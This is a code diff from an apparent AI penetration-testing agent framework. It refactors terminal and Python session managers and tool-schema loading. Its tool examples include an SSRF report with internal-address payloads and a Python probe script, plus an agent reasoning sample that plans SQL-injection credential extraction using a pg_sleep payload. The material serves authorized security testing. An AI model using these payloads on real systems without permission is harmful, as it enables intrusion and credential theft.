return {"sessions": session_info, "total_count": len(session_info)}
def cleanup_agent(self, agent_id: str) -> None:
with self._lock:
sessions = self._sessions_by_agent.pop(agent_id, {})
for session in sessions.values():
with contextlib.suppress(Exception):
session.close()
def cleanup_dead_sessions(self) -> None:
with self._lock:
dead_sessions = []
for sid, session in self.sessions.items():
if not session.is_alive():
dead_sessions.append(sid)
for sessions in self._sessions_by_agent.values():
dead_sessions = []
for sid, session in sessions.items():
if not session.is_alive():
dead_sessions.append(sid)
for sid in dead_sessions:
session = self.sessions.pop(sid)
with contextlib.suppress(Exception):
session.close()
for sid in dead_sessions:
session = sessions.pop(sid)
with contextlib.suppress(Exception):
session.close()
def close_all_sessions(self) -> None:
with self._lock:
sessions_to_close = list(self.sessions.values())
self.sessions.clear()
all_sessions: list[PythonInstance] = []
for sessions in self._sessions_by_agent.values():
all_sessions.extend(sessions.values())
self._sessions_by_agent.clear()
for session in sessions_to_close:
for session in all_sessions:
with contextlib.suppress(Exception):
session.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all_sessions)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all_sessions()
sys.exit(0)
_python_session_manager = PythonSessionManager()

View File

@@ -7,9 +7,14 @@ from inspect import signature
from pathlib import Path
from typing import Any
import defusedxml.ElementTree as DefusedET
from strix.utils.resource_paths import get_strix_resource_path
tools: list[dict[str, Any]] = []
_tools_by_name: dict[str, Callable[..., Any]] = {}
_tool_param_schemas: dict[str, dict[str, Any]] = {}
logger = logging.getLogger(__name__)
@@ -82,6 +87,34 @@ def _load_xml_schema(path: Path) -> Any:
return tools_dict
def _parse_param_schema(tool_xml: str) -> dict[str, Any]:
params: set[str] = set()
required: set[str] = set()
params_start = tool_xml.find("<parameters>")
params_end = tool_xml.find("</parameters>")
if params_start == -1 or params_end == -1:
return {"params": set(), "required": set(), "has_params": False}
params_section = tool_xml[params_start : params_end + len("</parameters>")]
try:
root = DefusedET.fromstring(params_section)
except DefusedET.ParseError:
return {"params": set(), "required": set(), "has_params": False}
for param in root.findall(".//parameter"):
name = param.attrib.get("name")
if not name:
continue
params.add(name)
if param.attrib.get("required", "false").lower() == "true":
required.add(name)
return {"params": params, "required": required, "has_params": bool(params or required)}
def _get_module_name(func: Callable[..., Any]) -> str:
module = inspect.getmodule(func)
if not module:
@@ -95,6 +128,27 @@ def _get_module_name(func: Callable[..., Any]) -> str:
return "unknown"
def _get_schema_path(func: Callable[..., Any]) -> Path | None:
module = inspect.getmodule(func)
if not module or not module.__name__:
return None
module_name = module.__name__
if ".tools." not in module_name:
return None
parts = module_name.split(".tools.")[-1].split(".")
if len(parts) < 2:
return None
folder = parts[0]
file_stem = parts[1]
schema_file = f"{file_stem}_schema.xml"
return get_strix_resource_path("tools", folder, schema_file)
def register_tool(
func: Callable[..., Any] | None = None, *, sandbox_execution: bool = True
) -> Callable[..., Any]:
@@ -109,11 +163,8 @@ def register_tool(
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not sandbox_mode:
try:
module_path = Path(inspect.getfile(f))
schema_file_name = f"{module_path.stem}_schema.xml"
schema_path = module_path.parent / schema_file_name
xml_tools = _load_xml_schema(schema_path)
schema_path = _get_schema_path(f)
xml_tools = _load_xml_schema(schema_path) if schema_path else None
if xml_tools is not None and f.__name__ in xml_tools:
func_dict["xml_schema"] = xml_tools[f.__name__]
@@ -131,6 +182,11 @@ def register_tool(
"</tool>"
)
if not sandbox_mode:
xml_schema = func_dict.get("xml_schema")
param_schema = _parse_param_schema(xml_schema if isinstance(xml_schema, str) else "")
_tool_param_schemas[str(func_dict["name"])] = param_schema
tools.append(func_dict)
_tools_by_name[str(func_dict["name"])] = f
@@ -153,6 +209,10 @@ def get_tool_names() -> list[str]:
return list(_tools_by_name.keys())
def get_tool_param_schema(name: str) -> dict[str, Any] | None:
return _tool_param_schemas.get(name)
def needs_agent_state(tool_name: str) -> bool:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
@@ -194,3 +254,4 @@ def get_tools_prompt() -> str:
def clear_registry() -> None:
tools.clear()
_tools_by_name.clear()
_tool_param_schemas.clear()

View File

@@ -131,5 +131,148 @@ H = High (total loss of availability)</description>
- On success: success=true, message, report_id, severity, cvss_score
- On duplicate detection: success=false, message (with duplicate info), duplicate_of (ID), duplicate_title, confidence (0-1), reason (why it's a duplicate)</description>
</returns>
<examples>
<function=create_vulnerability_report>
<parameter=title>Server-Side Request Forgery (SSRF) via URL Preview Feature Enables Internal Network Access</parameter>
<parameter=description>A server-side request forgery (SSRF) vulnerability was identified in the URL preview feature that generates rich previews for user-supplied links.
The application performs server-side HTTP requests to retrieve metadata (title, description, thumbnails). Insufficient validation of the destination allows an attacker to coerce the server into making requests to internal network hosts and link-local addresses that are not directly reachable from the internet.
This issue is particularly high risk in cloud-hosted environments where link-local metadata services may expose sensitive information (e.g., instance identifiers, temporary credentials) if reachable from the application runtime.</parameter>
<parameter=impact>Successful exploitation may allow an attacker to:
- Reach internal-only services (admin panels, service discovery endpoints, unauthenticated microservices)
- Enumerate internal network topology based on timing and response differences
- Access link-local services that should never be reachable from user input paths
- Potentially retrieve sensitive configuration data and temporary credentials in certain hosting environments
Business impact includes increased likelihood of lateral movement, data exposure from internal systems, and compromise of cloud resources if credentials are obtained.</parameter>
<parameter=target>https://app.acme-corp.com</parameter>
<parameter=technical_analysis>The vulnerable behavior occurs when the application accepts a user-controlled URL and fetches it server-side to generate a preview. The response body and/or selected metadata fields are then returned to the client.
Observed security gaps:
- No robust allowlist of approved outbound domains
- No effective blocking of private, loopback, and link-local address ranges
- Redirect handling can be leveraged to reach disallowed destinations if not revalidated after following redirects
- DNS resolution and IP validation appear to occur without normalization safeguards, creating bypass risk (e.g., encoded IPs, mixed IPv6 notation, DNS rebinding scenarios)
As a result, an attacker can supply a URL that resolves to an internal destination. The server performs the request from a privileged network position, and the attacker can infer results via returned preview content or measurable response differences.</parameter>
<parameter=poc_description>To reproduce:
1. Authenticate to the application as a standard user.
2. Navigate to the link preview feature (e.g., “Add Link”, “Preview URL”, or equivalent UI).
3. Submit a URL pointing to an internal resource. Example payloads:
- http://127.0.0.1:80/
- http://localhost:8080/
- http://10.0.0.1:80/
- http://169.254.169.254/ (link-local)
4. Observe that the server attempts to fetch the destination and returns either:
- Preview content/metadata from the target, or
- Error/timing differences that confirm network reachability.
Impact validation:
- Use a controlled internal endpoint (or a benign endpoint that returns a distinct marker) to demonstrate that the request is performed by the server, not the client.
- If the application follows redirects, validate whether an allowlisted URL can redirect to a disallowed destination, and whether the redirected-to destination is still fetched.</parameter>
<parameter=poc_script_code>import json
import sys
import time
from urllib.parse import urljoin
import requests
BASE = "https://app.acme-corp.com"
PREVIEW_ENDPOINT = urljoin(BASE, "/api/v1/link-preview")
SESSION_COOKIE = "" # Set to your authenticated session cookie value if needed
TARGETS = [
"http://127.0.0.1:80/",
"http://localhost:8080/",
"http://10.0.0.1:80/",
"http://169.254.169.254/",
]
def preview(url: str) -> tuple[int, float, str]:
headers = {
"Content-Type": "application/json",
}
cookies = {}
if SESSION_COOKIE:
cookies["session"] = SESSION_COOKIE
payload = {"url": url}
start = time.time()
resp = requests.post(PREVIEW_ENDPOINT, headers=headers, cookies=cookies, data=json.dumps(payload), timeout=15)
elapsed = time.time() - start
body = resp.text
snippet = body[:500]
return resp.status_code, elapsed, snippet
def main() -> int:
print(f"Endpoint: {PREVIEW_ENDPOINT}")
print("Testing SSRF candidates (server-side fetch behavior):")
print()
for url in TARGETS:
try:
status, elapsed, snippet = preview(url)
print(f"URL: {url}")
print(f"Status: {status}")
print(f"Elapsed: {elapsed:.2f}s")
print("Body (first 500 chars):")
print(snippet)
print("-" * 60)
except requests.RequestException as e:
print(f"URL: {url}")
print(f"Request failed: {e}")
print("-" * 60)
return 0
if __name__ == "__main__":
raise SystemExit(main())</parameter>
<parameter=remediation_steps>Implement layered SSRF defenses:
1. Explicit allowlist for outbound destinations
- Only permit fetching from a maintained set of approved domains (and required schemes).
- Reject all other destinations by default.
2. Robust IP range blocking after DNS resolution
- Resolve the hostname and block private, loopback, link-local, and reserved ranges for both IPv4 and IPv6.
- Re-validate on every redirect hop; do not follow redirects to disallowed destinations.
3. URL normalization and parser hardening
- Normalize and validate the URL using a strict parser.
- Reject ambiguous encodings and unusual notations that can bypass filters.
4. Network egress controls (defense in depth)
- Enforce outbound firewall rules so the application runtime cannot reach sensitive internal ranges or link-local addresses.
- If previews are required, route outbound requests through a dedicated egress proxy with policy enforcement and auditing.
5. Response handling hardening
- Avoid returning raw response bodies from previews.
- Strictly limit what metadata is returned and apply size/time limits to outbound fetches.
6. Monitoring and alerting
- Log and alert on preview attempts to unusual destinations, repeated failures, high-frequency requests, or attempts to access blocked ranges.</parameter>
<parameter=attack_vector>N</parameter>
<parameter=attack_complexity>L</parameter>
<parameter=privileges_required>L</parameter>
<parameter=user_interaction>N</parameter>
<parameter=scope>C</parameter>
<parameter=confidentiality>H</parameter>
<parameter=integrity>H</parameter>
<parameter=availability>L</parameter>
<parameter=endpoint>/api/v1/link-preview</parameter>
<parameter=method>POST</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -95,6 +95,12 @@
<parameter=command>ls -la</parameter>
</function>
<function=terminal_execute>
<parameter=command>cd /workspace
pwd
ls -la</parameter>
</function>
# Run a command with custom timeout
<function=terminal_execute>
<parameter=command>npm install</parameter>

View File

@@ -1,22 +1,29 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from strix.tools.context import get_current_agent_id
from .terminal_session import TerminalSession
class TerminalManager:
def __init__(self) -> None:
self.sessions: dict[str, TerminalSession] = {}
self._sessions_by_agent: dict[str, dict[str, TerminalSession]] = {}
self._lock = threading.Lock()
self.default_terminal_id = "default"
self.default_timeout = 30.0
self._register_cleanup_handlers()
def _get_agent_sessions(self) -> dict[str, TerminalSession]:
agent_id = get_current_agent_id()
with self._lock:
if agent_id not in self._sessions_by_agent:
self._sessions_by_agent[agent_id] = {}
return self._sessions_by_agent[agent_id]
def execute_command(
self,
command: str,
@@ -64,24 +71,26 @@ class TerminalManager:
}
def _get_or_create_session(self, terminal_id: str) -> TerminalSession:
sessions = self._get_agent_sessions()
with self._lock:
if terminal_id not in self.sessions:
self.sessions[terminal_id] = TerminalSession(terminal_id)
return self.sessions[terminal_id]
if terminal_id not in sessions:
sessions[terminal_id] = TerminalSession(terminal_id)
return sessions[terminal_id]
def close_session(self, terminal_id: str | None = None) -> dict[str, Any]:
if terminal_id is None:
terminal_id = self.default_terminal_id
sessions = self._get_agent_sessions()
with self._lock:
if terminal_id not in self.sessions:
if terminal_id not in sessions:
return {
"terminal_id": terminal_id,
"message": f"Terminal '{terminal_id}' not found",
"status": "not_found",
}
session = self.sessions.pop(terminal_id)
session = sessions.pop(terminal_id)
try:
session.close()
@@ -99,9 +108,10 @@ class TerminalManager:
}
def list_sessions(self) -> dict[str, Any]:
sessions = self._get_agent_sessions()
with self._lock:
session_info: dict[str, dict[str, Any]] = {}
for tid, session in self.sessions.items():
for tid, session in sessions.items():
session_info[tid] = {
"is_running": session.is_running(),
"working_dir": session.get_working_dir(),
@@ -109,40 +119,41 @@ class TerminalManager:
return {"sessions": session_info, "total_count": len(session_info)}
def cleanup_agent(self, agent_id: str) -> None:
with self._lock:
sessions = self._sessions_by_agent.pop(agent_id, {})
for session in sessions.values():
with contextlib.suppress(Exception):
session.close()
def cleanup_dead_sessions(self) -> None:
with self._lock:
dead_sessions: list[str] = []
for tid, session in self.sessions.items():
if not session.is_running():
dead_sessions.append(tid)
for sessions in self._sessions_by_agent.values():
dead_sessions: list[str] = []
for tid, session in sessions.items():
if not session.is_running():
dead_sessions.append(tid)
for tid in dead_sessions:
session = self.sessions.pop(tid)
with contextlib.suppress(Exception):
session.close()
for tid in dead_sessions:
session = sessions.pop(tid)
with contextlib.suppress(Exception):
session.close()
def close_all_sessions(self) -> None:
with self._lock:
sessions_to_close = list(self.sessions.values())
self.sessions.clear()
all_sessions: list[TerminalSession] = []
for sessions in self._sessions_by_agent.values():
all_sessions.extend(sessions.values())
self._sessions_by_agent.clear()
for session in sessions_to_close:
for session in all_sessions:
with contextlib.suppress(Exception):
session.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all_sessions)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all_sessions()
sys.exit(0)
_terminal_manager = TerminalManager()

View File

@@ -19,33 +19,35 @@
<examples>
# Planning and strategy
<function=think>
<parameter=thought>I need to analyze the scan results systematically. First, let me review
the open ports: 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL). The MySQL port being
externally accessible is a high priority security concern. I should check for default
credentials and version information. For the web services, I need to enumerate
directories and test for common web vulnerabilities.</parameter>
</function>
<parameter=thought>Analysis of the login endpoint SQL injection:
# Analysis of tool outputs
<function=think>
<parameter=thought>The Nmap scan revealed 15 open ports, but three stand out as concerning:
- Port 3306 (MySQL) - Database should not be exposed externally
- Port 5432 (PostgreSQL) - Another database port that's risky when public
- Port 6379 (Redis) - Often misconfigured and can lead to data exposure
I should prioritize testing these database services for authentication bypass and
information disclosure vulnerabilities.</parameter>
</function>
Current State:
- Confirmed SQL injection in POST /api/v1/auth/login
- Backend database is PostgreSQL 14.2
- Application user has full CRUD privileges
# Decision making and next steps
<function=think>
<parameter=thought>Based on the vulnerability scan results, I've identified several critical
issues that need immediate attention:
1. SQL injection in the login form (confirmed with sqlmap)
2. Reflected XSS in the search parameter
3. Directory traversal in the file upload function
I should document these findings with proof-of-concept exploits and assign appropriate
CVSS scores. The SQL injection poses the highest risk due to potential data
exfiltration.</parameter>
Exploitation Strategy:
1. First, enumerate database structure using UNION-based injection
2. Extract user table schema and credentials
3. Check for password hashing (MD5? bcrypt?)
4. Look for admin accounts and API keys
Risk Assessment:
- CVSS Base Score: 9.8 (Critical)
- Attack Vector: Network (remotely exploitable)
- Privileges Required: None
- Impact: Full database compromise
Evidence Collected:
- Error-based injection confirms PostgreSQL
- Time-based payload: admin' AND pg_sleep(5)-- caused 5s delay
- UNION injection reveals 8 columns in users table
Next Actions:
1. Write PoC exploit script in Python
2. Extract password hashes for analysis
3. Create vulnerability report with full details
4. Test if same vulnerability exists in other endpoints</parameter>
</function>
</examples>
</tool>

0
strix/utils/__init__.py Normal file
View File

View File

@@ -0,0 +1,13 @@
import sys
from pathlib import Path
def get_strix_resource_path(*parts: str) -> Path:
frozen_base = getattr(sys, "_MEIPASS", None)
if frozen_base:
base = Path(frozen_base) / "strix"
if base.exists():
return base.joinpath(*parts)
base = Path(__file__).resolve().parent.parent
return base.joinpath(*parts)